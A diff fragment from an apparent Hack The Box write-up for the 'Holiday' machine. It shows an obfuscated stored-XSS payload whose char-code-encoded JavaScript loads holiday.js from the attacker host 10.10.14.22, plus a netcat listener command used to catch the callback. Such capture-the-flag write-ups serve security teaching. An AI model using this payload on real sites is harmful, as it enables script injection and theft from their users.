Kyuu-Ji/htb-write-up/holiday/write-up-holiday.md

 <img src="x/><script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,49,48,46,49,48,46,49,52,46,50,50,47,104,111,108,105,100,97,121,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59))</script>">
 ```

-I listen on port 80 on my local machine with `nc -lvnp 80` and send the encoded JavaScript as a note and after a while it will make a connection on my local web server which means we got a successful XSS exploit.
+My local machine listens on port 80 with `nc -lvnp 80` and we send the encoded JavaScript as a note and after a while it will make a connection on my local web server which means we got a successful XSS exploit.

 #### Creating the XSS payload